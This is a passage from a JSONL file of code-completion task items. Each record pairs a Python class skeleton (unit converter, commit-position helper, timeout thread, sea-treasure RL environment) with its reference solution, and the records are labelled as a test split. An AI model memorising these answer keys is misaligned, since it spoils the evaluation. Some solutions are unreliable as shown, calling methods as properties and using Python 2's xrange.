"def conversions(self, conversion_factor, start_list=None)"}, {"docstring": "builds the dictionary", "name": "build_conversions", "signature": "def build_conversions(self)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_000872", "prompt": "Implement the Python class `BaseConverter` described below.\n\nClass description:\nA creator of unit-conversion dictionaries\n\nMethod signatures and docstrings:\n- def __init__(self, to_units, kilo_prefix): base_converter constructor :param: - `to_units`: a list of the units to covert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units\n- def prefix_conversions(self): List of lists of prefix conversions\n- def bits_to_bytes(self): List of conversions for bits to bytes\n- def bytes_to_bits(self): list of conversions for bytes to bits\n- def conversions(self, conversion_factor, start_list=None): Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: list of conversion_lists\n- def build_conversions(self): builds the dictionary", "prompted_full_text": "Implement the Python class `BaseConverter` described below.\n\nClass description:\nA creator of unit-conversion dictionaries\n\nMethod signatures and docstrings:\n- def __init__(self, to_units, kilo_prefix): base_converter constructor :param: - `to_units`: a list of the units to covert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units\n- def prefix_conversions(self): List of lists of prefix conversions\n- def bits_to_bytes(self): List of conversions for bits to bytes\n- def bytes_to_bits(self): list of conversions for bytes to bits\n- def conversions(self, conversion_factor, start_list=None): Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: list of conversion_lists\n- def build_conversions(self): builds the dictionary\n\n<|skeleton|>\nclass BaseConverter:\n \"\"\"A creator of unit-conversion dictionaries\"\"\"\n\n def __init__(self, to_units, kilo_prefix):\n \"\"\"base_converter constructor :param: - `to_units`: a list of the units to covert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units\"\"\"\n <|body_0|>\n\n def prefix_conversions(self):\n \"\"\"List of lists of prefix conversions\"\"\"\n <|body_1|>\n\n def bits_to_bytes(self):\n \"\"\"List of conversions for bits to bytes\"\"\"\n <|body_2|>\n\n def bytes_to_bits(self):\n \"\"\"list of conversions for bytes to bits\"\"\"\n <|body_3|>\n\n def conversions(self, conversion_factor, start_list=None):\n \"\"\"Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: list of conversion_lists\"\"\"\n <|body_4|>\n\n def build_conversions(self):\n \"\"\"builds the dictionary\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.to_units = to_units\n self.kilo_prefix = kilo_prefix\n self._prefix_conversions = None\n self._bits_to_bytes = None\n self._bytes_to_bits = None\n self.bit_conversions = self.byte_conversions = len(to_units) // 2\n self.bit_units = to_units[:self.bit_conversions]\n self.byte_units = to_units[self.byte_conversions:]\n return\n<|end_body_0|>\n\n<|body_start_1|>\n if self._prefix_conversions is None:\n start_list = [self.kilo_prefix ** (-power) for power in range(self.bit_conversions)]\n self._prefix_conversions = self.conversions(conversion_factor=1, start_list=start_list)\n return self._prefix_conversions\n<|end_body_1|>\n\n<|body_start_2|>\n if self._bits_to_bytes is None:\n self._bits_to_bytes = self.conversions(conversion_factor=TO_BYTE)\n return self._bits_to_bytes\n<|end_body_2|>\n\n<|body_start_3|>\n if self._bytes_to_bits is None:\n self._bytes_to_bits = self.conversions(conversion_factor=BYTE)\n return self._bytes_to_bits\n<|end_body_3|>\n\n<|body_start_4|>\n if start_list is None:\n start_list = self.prefix_conversions[0]\n converter_list = [[conversion_factor * conversion for conversion in start_list]]\n for previous in range(self.bit_conversions - 1):\n next_conversions = [self.kilo_prefix ** (previous + 1) * conversion_factor] + converter_list[previous][:-1]\n converter_list.append(next_conversions)\n return converter_list\n<|end_body_4|>\n\n<|body_start_5|>\n for index, units in enumerate(self.bit_units):\n self[units] = dict(list(zip(self.to_units, self.prefix_conversions[index] + self.bits_to_bytes[index])))\n for index, units in enumerate(self.byte_units):\n self[units] = dict(list(zip(self.to_units, self.bytes_to_bits[index] + self.prefix_conversions[index])))\n return\n<|end_body_5|>\n", "revision_id": "2007bf3fe66edfe704e485141c55caed54fe13aa", "skeleton": "<|skeleton|>\nclass BaseConverter:\n \"\"\"A creator of unit-conversion dictionaries\"\"\"\n\n def __init__(self, to_units, kilo_prefix):\n \"\"\"base_converter constructor :param: - `to_units`: a list of the units to covert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units\"\"\"\n <|body_0|>\n\n def prefix_conversions(self):\n \"\"\"List of lists of prefix conversions\"\"\"\n <|body_1|>\n\n def bits_to_bytes(self):\n \"\"\"List of conversions for bits to bytes\"\"\"\n <|body_2|>\n\n def bytes_to_bits(self):\n \"\"\"list of conversions for bytes to bits\"\"\"\n <|body_3|>\n\n def conversions(self, conversion_factor, start_list=None):\n \"\"\"Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: list of conversion_lists\"\"\"\n <|body_4|>\n\n def build_conversions(self):\n \"\"\"builds the dictionary\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class BaseConverter:\n \"\"\"A creator of unit-conversion dictionaries\"\"\"\n\n def __init__(self, to_units, kilo_prefix):\n \"\"\"base_converter constructor :param: - `to_units`: a list of the units to covert to (has to be half to-bits, half to-bytes) - `kilo_prefix`: kilo multiplier matching type of units\"\"\"\n self.to_units = to_units\n self.kilo_prefix = kilo_prefix\n self._prefix_conversions = None\n self._bits_to_bytes = None\n self._bytes_to_bits = None\n self.bit_conversions = self.byte_conversions = len(to_units) // 2\n self.bit_units = to_units[:self.bit_conversions]\n self.byte_units = to_units[self.byte_conversions:]\n return\n\n def prefix_conversions(self):\n \"\"\"List of lists of prefix conversions\"\"\"\n if self._prefix_conversions is None:\n start_list = [self.kilo_prefix ** (-power) for power in range(self.bit_conversions)]\n self._prefix_conversions = self.conversions(conversion_factor=1, start_list=start_list)\n return self._prefix_conversions\n\n def bits_to_bytes(self):\n \"\"\"List of conversions for bits to bytes\"\"\"\n if self._bits_to_bytes is None:\n self._bits_to_bytes = self.conversions(conversion_factor=TO_BYTE)\n return self._bits_to_bytes\n\n def bytes_to_bits(self):\n \"\"\"list of conversions for bytes to bits\"\"\"\n if self._bytes_to_bits is None:\n self._bytes_to_bits = self.conversions(conversion_factor=BYTE)\n return self._bytes_to_bits\n\n def conversions(self, conversion_factor, start_list=None):\n \"\"\"Creates the converter-lists :param: - `conversion_factor`: multiplier for values (8 or 1/8, or 1) - `start_list`: if given, use to start the conversion-list :return: list of conversion_lists\"\"\"\n if start_list is None:\n start_list = self.prefix_conversions[0]\n converter_list = [[conversion_factor * conversion for conversion in start_list]]\n for previous in range(self.bit_conversions - 1):\n next_conversions = [self.kilo_prefix ** (previous + 1) * conversion_factor] + converter_list[previous][:-1]\n converter_list.append(next_conversions)\n return converter_list\n\n def build_conversions(self):\n \"\"\"builds the dictionary\"\"\"\n for index, units in enumerate(self.bit_units):\n self[units] = dict(list(zip(self.to_units, self.prefix_conversions[index] + self.bits_to_bytes[index])))\n for index, units in enumerate(self.byte_units):\n self[units] = dict(list(zip(self.to_units, self.bytes_to_bits[index] + self.prefix_conversions[index])))\n return\n", "source": "the_stack_v2_python_sparse", "source_path": "utils/iperflexer/unitconverter.py", "source_repo": "AndriyZabavskyy/taf", "split": "test", "star_events_count": 0} {"blob_id": "cef2b5861fa3e232f5a6574246b28a99cd53136e", "bodies": ["assert revision in self.blame_list\nfor i in range(0, len(self.blame_list)):\n if revision == self.blame_list[i]:\n return i + self.previous_build_commit_position + 1", "length = len(self.blame_list)\nassert commit_position > self.commit_position - length and commit_position <= self.commit_position\nreturn self.blame_list[length - (self.commit_position - commit_position) - 1]", "blamed_cls = {}\ncommit_position = self.commit_position\nfor i in xrange(len(self.blame_list) - 1, -1, -1):\n blamed_cls[commit_position] = self.blame_list[i]\n commit_position -= 1\nreturn blamed_cls"], "bodies_text": "<|body_start_0|>\n assert revision in self.blame_list\n for i in range(0, len(self.blame_list)):\n if revision == self.blame_list[i]:\n return i + self.previous_build_commit_position + 1\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(self.blame_list)\n assert commit_position > self.commit_position - length and commit_position <= self.commit_position\n return self.blame_list[length - (self.commit_position - commit_position) - 1]\n<|end_body_1|>\n\n<|body_start_2|>\n blamed_cls = {}\n commit_position = self.commit_position\n for i in xrange(len(self.blame_list) - 1, -1, -1):\n blamed_cls[commit_position] = self.blame_list[i]\n commit_position -= 1\n return blamed_cls\n<|end_body_2|>\n", "class_docstring": "", "class_name": "DataPoint", "detected_licenses": ["BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DataPoint:\n\n def GetCommitPosition(self, revision):\n \"\"\"Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.\"\"\"\n <|body_0|>\n\n def GetRevisionAtCommitPosition(self, commit_position):\n \"\"\"Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. Returns: revision (str): The git revision corresponding to commit_position.\"\"\"\n <|body_1|>\n\n def GetDictOfCommitPositionAndRevision(self):\n \"\"\"Gets a dict of commit_position:revision items for this data_point.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert revision in self.blame_list\n for i in range(0, len(self.blame_list)):\n if revision == self.blame_list[i]:\n return i + self.previous_build_commit_position + 1\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(self.blame_list)\n assert commit_position > self.commit_position - length and commit_position <= self.commit_position\n return self.blame_list[length - (self.commit_position - commit_position) - 1]\n<|end_body_1|>\n\n<|body_start_2|>\n blamed_cls = {}\n commit_position = self.commit_position\n for i in xrange(len(self.blame_list) - 1, -1, -1):\n blamed_cls[commit_position] = self.blame_list[i]\n commit_position -= 1\n return blamed_cls\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000299", "length_bytes": 11733, "license_type": "permissive", "methods": [{"docstring": "Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.", "name": "GetCommitPosition", "signature": "def GetCommitPosition(self, revision)"}, {"docstring": "Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. Returns: revision (str): The git revision corresponding to commit_position.", "name": "GetRevisionAtCommitPosition", "signature": "def GetRevisionAtCommitPosition(self, commit_position)"}, {"docstring": "Gets a dict of commit_position:revision items for this data_point.", "name": "GetDictOfCommitPositionAndRevision", "signature": "def GetDictOfCommitPositionAndRevision(self)"}], "n_methods": 3, "prompt": "Implement the Python class `DataPoint` described below.\n\nClass description:\nImplement the DataPoint class.\n\nMethod signatures and docstrings:\n- def GetCommitPosition(self, revision): Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.\n- def GetRevisionAtCommitPosition(self, commit_position): Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. Returns: revision (str): The git revision corresponding to commit_position.\n- def GetDictOfCommitPositionAndRevision(self): Gets a dict of commit_position:revision items for this data_point.", "prompted_full_text": "Implement the Python class `DataPoint` described below.\n\nClass description:\nImplement the DataPoint class.\n\nMethod signatures and docstrings:\n- def GetCommitPosition(self, revision): Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.\n- def GetRevisionAtCommitPosition(self, commit_position): Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. Returns: revision (str): The git revision corresponding to commit_position.\n- def GetDictOfCommitPositionAndRevision(self): Gets a dict of commit_position:revision items for this data_point.\n\n<|skeleton|>\nclass DataPoint:\n\n def GetCommitPosition(self, revision):\n \"\"\"Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.\"\"\"\n <|body_0|>\n\n def GetRevisionAtCommitPosition(self, commit_position):\n \"\"\"Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. Returns: revision (str): The git revision corresponding to commit_position.\"\"\"\n <|body_1|>\n\n def GetDictOfCommitPositionAndRevision(self):\n \"\"\"Gets a dict of commit_position:revision items for this data_point.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert revision in self.blame_list\n for i in range(0, len(self.blame_list)):\n if revision == self.blame_list[i]:\n return i + self.previous_build_commit_position + 1\n<|end_body_0|>\n\n<|body_start_1|>\n length = len(self.blame_list)\n assert commit_position > self.commit_position - length and commit_position <= self.commit_position\n return self.blame_list[length - (self.commit_position - commit_position) - 1]\n<|end_body_1|>\n\n<|body_start_2|>\n blamed_cls = {}\n commit_position = self.commit_position\n for i in xrange(len(self.blame_list) - 1, -1, -1):\n blamed_cls[commit_position] = self.blame_list[i]\n commit_position -= 1\n return blamed_cls\n<|end_body_2|>\n", "revision_id": "09064105713603f7bf75c772e8354800a1bfa256", "skeleton": "<|skeleton|>\nclass DataPoint:\n\n def GetCommitPosition(self, revision):\n \"\"\"Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.\"\"\"\n <|body_0|>\n\n def GetRevisionAtCommitPosition(self, commit_position):\n \"\"\"Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. Returns: revision (str): The git revision corresponding to commit_position.\"\"\"\n <|body_1|>\n\n def GetDictOfCommitPositionAndRevision(self):\n \"\"\"Gets a dict of commit_position:revision items for this data_point.\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DataPoint:\n def GetCommitPosition(self, revision):\n \"\"\"Gets the commit position of a revision within blame_list. Args: revision (str): The revision to search for. Returns: commit_position (int): The calculated commit position of revision.\"\"\"\n assert revision in self.blame_list\n for i in range(0, len(self.blame_list)):\n if revision == self.blame_list[i]:\n return i + self.previous_build_commit_position + 1\n\n def GetRevisionAtCommitPosition(self, commit_position):\n \"\"\"Gets the corresponding revision to commit_position. Args: commit_position (int): The commit position for which to find the corresponding revision within self.blame_list. Returns: revision (str): The git revision corresponding to commit_position.\"\"\"\n length = len(self.blame_list)\n assert commit_position > self.commit_position - length and commit_position <= self.commit_position\n return self.blame_list[length - (self.commit_position - commit_position) - 1]\n\n def GetDictOfCommitPositionAndRevision(self):\n \"\"\"Gets a dict of commit_position:revision items for this data_point.\"\"\"\n blamed_cls = {}\n commit_position = self.commit_position\n for i in xrange(len(self.blame_list) - 1, -1, -1):\n blamed_cls[commit_position] = self.blame_list[i]\n commit_position -= 1\n return blamed_cls\n", "source": "the_stack_v2_python_sparse", "source_path": "appengine/findit/model/flake/master_flake_analysis.py", "source_repo": "mcgreevy/chromium-infra", "split": "test", "star_events_count": 1} {"blob_id": "459ef204d1c0f363be5dcfe3248056ac298a29ef", "bodies": ["threading.Thread.__init__(self)\nself.func = func\nself.args = args\nself.kwargs = kwargs\nself.result = NoResult", "try:\n self.result = self.func(*self.args, **self.kwargs)\nexcept Exception as e:\n self.result = NoResult"], "bodies_text": "<|body_start_0|>\n threading.Thread.__init__(self)\n self.func = func\n self.args = args\n self.kwargs = kwargs\n self.result = NoResult\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self.result = self.func(*self.args, **self.kwargs)\n except Exception as e:\n self.result = NoResult\n<|end_body_1|>\n", "class_docstring": "A Thread which can be used to timeout", "class_name": "TimeoutThread", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass TimeoutThread:\n \"\"\"A Thread which can be used to timeout\"\"\"\n\n def __init__(self, func, *args, **kwargs) -> None:\n \"\"\"Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments\"\"\"\n <|body_0|>\n\n def run(self) -> None:\n \"\"\"Call the function with the arguments to get the result Effect: Modifies the result of the function call\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n threading.Thread.__init__(self)\n self.func = func\n self.args = args\n self.kwargs = kwargs\n self.result = NoResult\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self.result = self.func(*self.args, **self.kwargs)\n except Exception as e:\n self.result = NoResult\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000300", "length_bytes": 2229, "license_type": "no_license", "methods": [{"docstring": "Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments", "name": "__init__", "signature": "def __init__(self, func, *args, **kwargs) -> None"}, {"docstring": "Call the function with the arguments to get the result Effect: Modifies the result of the function call", "name": "run", "signature": "def run(self) -> None"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_000436", "prompt": "Implement the Python class `TimeoutThread` described below.\n\nClass description:\nA Thread which can be used to timeout\n\nMethod signatures and docstrings:\n- def __init__(self, func, *args, **kwargs) -> None: Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments\n- def run(self) -> None: Call the function with the arguments to get the result Effect: Modifies the result of the function call", "prompted_full_text": "Implement the Python class `TimeoutThread` described below.\n\nClass description:\nA Thread which can be used to timeout\n\nMethod signatures and docstrings:\n- def __init__(self, func, *args, **kwargs) -> None: Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments\n- def run(self) -> None: Call the function with the arguments to get the result Effect: Modifies the result of the function call\n\n<|skeleton|>\nclass TimeoutThread:\n \"\"\"A Thread which can be used to timeout\"\"\"\n\n def __init__(self, func, *args, **kwargs) -> None:\n \"\"\"Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments\"\"\"\n <|body_0|>\n\n def run(self) -> None:\n \"\"\"Call the function with the arguments to get the result Effect: Modifies the result of the function call\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n threading.Thread.__init__(self)\n self.func = func\n self.args = args\n self.kwargs = kwargs\n self.result = NoResult\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self.result = self.func(*self.args, **self.kwargs)\n except Exception as e:\n self.result = NoResult\n<|end_body_1|>\n", "revision_id": "a59252a7d55a474bcb2b469414902c585bc89641", "skeleton": "<|skeleton|>\nclass TimeoutThread:\n \"\"\"A Thread which can be used to timeout\"\"\"\n\n def __init__(self, func, *args, **kwargs) -> None:\n \"\"\"Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments\"\"\"\n <|body_0|>\n\n def run(self) -> None:\n \"\"\"Call the function with the arguments to get the result Effect: Modifies the result of the function call\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class TimeoutThread:\n \"\"\"A Thread which can be used to timeout\"\"\"\n\n def __init__(self, func, *args, **kwargs) -> None:\n \"\"\"Construct a Timeout Thread :param func: The function being called :param args: The arguments :param kwargs: The key word arguments\"\"\"\n threading.Thread.__init__(self)\n self.func = func\n self.args = args\n self.kwargs = kwargs\n self.result = NoResult\n\n def run(self) -> None:\n \"\"\"Call the function with the arguments to get the result Effect: Modifies the result of the function call\"\"\"\n try:\n self.result = self.func(*self.args, **self.kwargs)\n except Exception as e:\n self.result = NoResult\n", "source": "the_stack_v2_python_sparse", "source_path": "evolution/root_evo/data_defs/timeout.py", "source_repo": "escowart/SoftwareDev", "split": "test", "star_events_count": 0} {"blob_id": "05ffbeee2eb933b53053c2f2a11218a3725a61d4", "bodies": ["original_mesh_shape = (10, 11)\nif columns < 1 or columns > original_mesh_shape[0]:\n columns = original_mesh_shape[0]\nfinals = {(0, 1): 5, (1, 2): 80, (2, 3): 120, (3, 4): 140, (4, 4): 145, (5, 4): 150, (6, 7): 163, (7, 7): 166, (8, 9): 173, (9, 10): 175}\nfinals = dict(filter(lambda x: x[0][0] < columns, finals.items()))\nobstacles = frozenset()\nobstacles = obstacles.union([(0, y) for y in range(2, 11)])\nobstacles = obstacles.union([(1, y) for y in range(3, 11)])\nobstacles = obstacles.union([(2, y) for y in range(4, 11)])\nobstacles = obstacles.union([(3, y) for y in range(5, 11)])\nobstacles = obstacles.union([(4, y) for y in range(5, 11)])\nobstacles = obstacles.union([(5, y) for y in range(5, 11)])\nobstacles = obstacles.union([(6, y) for y in range(8, 11)])\nobstacles = obstacles.union([(7, y) for y in range(8, 11)])\nobstacles = obstacles.union([(8, y) for y in range(10, 11)])\nobstacles = frozenset(filter(lambda x: x[0] < columns, obstacles))\nmesh_shape = (columns, 11)\ndefault_reward = (-1,) + default_reward + (0,)\ndefault_reward = Vector(default_reward)\nsuper().__init__(mesh_shape=mesh_shape, seed=seed, default_reward=default_reward, initial_state=initial_state, finals=finals, obstacles=obstacles, action_space=action_space)", "reward = self.default_reward.copy()\nself.current_state = self.next_state(action=action)\nreward[1] = self.finals.get(self.current_state, self.default_reward[1])\nreward[2] = -(self.current_state[1] + 1)\ninfo = {}\nfinal = self.is_final(self.current_state)\nreturn (self.current_state, reward, final, info)", "reward = self.default_reward.copy()\nreward[1] = self.finals.get(next_state, self.default_reward[1])\nreward[2] = -(next_state[1] + 1)\nreturn reward"], "bodies_text": "<|body_start_0|>\n original_mesh_shape = (10, 11)\n if columns < 1 or columns > original_mesh_shape[0]:\n columns = original_mesh_shape[0]\n finals = {(0, 1): 5, (1, 2): 80, (2, 3): 120, (3, 4): 140, (4, 4): 145, (5, 4): 150, (6, 7): 163, (7, 7): 166, (8, 9): 173, (9, 10): 175}\n finals = dict(filter(lambda x: x[0][0] < columns, finals.items()))\n obstacles = frozenset()\n obstacles = obstacles.union([(0, y) for y in range(2, 11)])\n obstacles = obstacles.union([(1, y) for y in range(3, 11)])\n obstacles = obstacles.union([(2, y) for y in range(4, 11)])\n obstacles = obstacles.union([(3, y) for y in range(5, 11)])\n obstacles = obstacles.union([(4, y) for y in range(5, 11)])\n obstacles = obstacles.union([(5, y) for y in range(5, 11)])\n obstacles = obstacles.union([(6, y) for y in range(8, 11)])\n obstacles = obstacles.union([(7, y) for y in range(8, 11)])\n obstacles = obstacles.union([(8, y) for y in range(10, 11)])\n obstacles = frozenset(filter(lambda x: x[0] < columns, obstacles))\n mesh_shape = (columns, 11)\n default_reward = (-1,) + default_reward + (0,)\n default_reward = Vector(default_reward)\n super().__init__(mesh_shape=mesh_shape, seed=seed, default_reward=default_reward, initial_state=initial_state, finals=finals, obstacles=obstacles, action_space=action_space)\n<|end_body_0|>\n\n<|body_start_1|>\n reward = self.default_reward.copy()\n self.current_state = self.next_state(action=action)\n reward[1] = self.finals.get(self.current_state, self.default_reward[1])\n reward[2] = -(self.current_state[1] + 1)\n info = {}\n final = self.is_final(self.current_state)\n return (self.current_state, reward, final, info)\n<|end_body_1|>\n\n<|body_start_2|>\n reward = self.default_reward.copy()\n reward[1] = self.finals.get(next_state, self.default_reward[1])\n reward[2] = -(next_state[1] + 1)\n return reward\n<|end_body_2|>\n", "class_docstring": "", "class_name": "PressurizedBountifulSeaTreasure", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass PressurizedBountifulSeaTreasure:\n\n def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None):\n \"\"\":param initial_state: Initial state where start the agent. :param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.\"\"\"\n <|body_0|>\n\n def step(self, action: int) -> (tuple, Vector, bool, dict):\n \"\"\"Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)\"\"\"\n <|body_1|>\n\n def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector:\n \"\"\"Return reward for reach `next_state` from `position` using `action`. :param state: initial position :param action: action to do :param next_state: next position reached :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n original_mesh_shape = (10, 11)\n if columns < 1 or columns > original_mesh_shape[0]:\n columns = original_mesh_shape[0]\n finals = {(0, 1): 5, (1, 2): 80, (2, 3): 120, (3, 4): 140, (4, 4): 145, (5, 4): 150, (6, 7): 163, (7, 7): 166, (8, 9): 173, (9, 10): 175}\n finals = dict(filter(lambda x: x[0][0] < columns, finals.items()))\n obstacles = frozenset()\n obstacles = obstacles.union([(0, y) for y in range(2, 11)])\n obstacles = obstacles.union([(1, y) for y in range(3, 11)])\n obstacles = obstacles.union([(2, y) for y in range(4, 11)])\n obstacles = obstacles.union([(3, y) for y in range(5, 11)])\n obstacles = obstacles.union([(4, y) for y in range(5, 11)])\n obstacles = obstacles.union([(5, y) for y in range(5, 11)])\n obstacles = obstacles.union([(6, y) for y in range(8, 11)])\n obstacles = obstacles.union([(7, y) for y in range(8, 11)])\n obstacles = obstacles.union([(8, y) for y in range(10, 11)])\n obstacles = frozenset(filter(lambda x: x[0] < columns, obstacles))\n mesh_shape = (columns, 11)\n default_reward = (-1,) + default_reward + (0,)\n default_reward = Vector(default_reward)\n super().__init__(mesh_shape=mesh_shape, seed=seed, default_reward=default_reward, initial_state=initial_state, finals=finals, obstacles=obstacles, action_space=action_space)\n<|end_body_0|>\n\n<|body_start_1|>\n reward = self.default_reward.copy()\n self.current_state = self.next_state(action=action)\n reward[1] = self.finals.get(self.current_state, self.default_reward[1])\n reward[2] = -(self.current_state[1] + 1)\n info = {}\n final = self.is_final(self.current_state)\n return (self.current_state, reward, final, info)\n<|end_body_1|>\n\n<|body_start_2|>\n reward = self.default_reward.copy()\n reward[1] = self.finals.get(next_state, self.default_reward[1])\n reward[2] = -(next_state[1] + 1)\n return reward\n<|end_body_2|>\n", "id": "stack_v2_sparse_classes_10k_test_000301", "length_bytes": 4453, "license_type": "no_license", "methods": [{"docstring": ":param initial_state: Initial state where start the agent. :param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.", "name": "__init__", "signature": "def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None)"}, {"docstring": "Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)", "name": "step", "signature": "def step(self, action: int) -> (tuple, Vector, bool, dict)"}, {"docstring": "Return reward for reach `next_state` from `position` using `action`. :param state: initial position :param action: action to do :param next_state: next position reached :return:", "name": "transition_reward", "signature": "def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector"}], "n_methods": 3, "original_id": "stack_v2_sparse_classes_30k_train_005727", "prompt": "Implement the Python class `PressurizedBountifulSeaTreasure` described below.\n\nClass description:\nImplement the PressurizedBountifulSeaTreasure class.\n\nMethod signatures and docstrings:\n- def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None): :param initial_state: Initial state where start the agent. :param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.\n- def step(self, action: int) -> (tuple, Vector, bool, dict): Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)\n- def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector: Return reward for reach `next_state` from `position` using `action`. :param state: initial position :param action: action to do :param next_state: next position reached :return:", "prompted_full_text": "Implement the Python class `PressurizedBountifulSeaTreasure` described below.\n\nClass description:\nImplement the PressurizedBountifulSeaTreasure class.\n\nMethod signatures and docstrings:\n- def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None): :param initial_state: Initial state where start the agent. :param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.\n- def step(self, action: int) -> (tuple, Vector, bool, dict): Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)\n- def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector: Return reward for reach `next_state` from `position` using `action`. :param state: initial position :param action: action to do :param next_state: next position reached :return:\n\n<|skeleton|>\nclass PressurizedBountifulSeaTreasure:\n\n def __init__(self, initial_state: tuple=(0, 0), default_reward: tuple=(0,), seed: int=0, columns: int=0, action_space: gym.spaces=None):\n \"\"\":param initial_state: Initial state where start the agent. :param default_reward: (treasure_value, ) :param seed: Seed used for np.random.RandomState method.\"\"\"\n <|body_0|>\n\n def step(self, action: int) -> (tuple, Vector, bool, dict):\n \"\"\"Given an action, do a step :param action: :return: (position, (time_inverted, treasure_value), final, extra)\"\"\"\n <|body_1|>\n\n def transition_reward(self, state: tuple, action: int, next_state: tuple) -> Vector:\n \"\"\"Return reward for reach `next_state` from `position` using `action`. :param state: initial position :param action: action to do :param next_state: next position reached :return:\"\"\"\n <|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n original_mesh_shape = (10, 11)\n if columns < 1 or columns > original_mesh_shape[0]:\n columns = original_mesh_shape[0]\n finals = {(0, 1): 5, (1, 2): 80, (2, 3): 120, (3, 4): 140, (4, 4): 145, (5, 4): 150, (6, 7): 163, (7, 7): 166, (8, 9): 173, (9, 10): 175}\n finals = dict(filter(lambda x: x[0][0] < columns, finals.items()))\n obstacles = frozenset()\n obstacles = obstacles.union([(0, y) for y in range(2, 11)])\n obstacles = obstacles.union([(1, y) for y in range(3, 11)])\n obstacles = obstacles.union([(2, y) for y in range(4, 11)])\n obstacles = obstacles.union([(3, y) for y in range(5, 11)])\n obstacles = obstacles.union([(4, y) for y in range(5, 11)])\n obstacles = 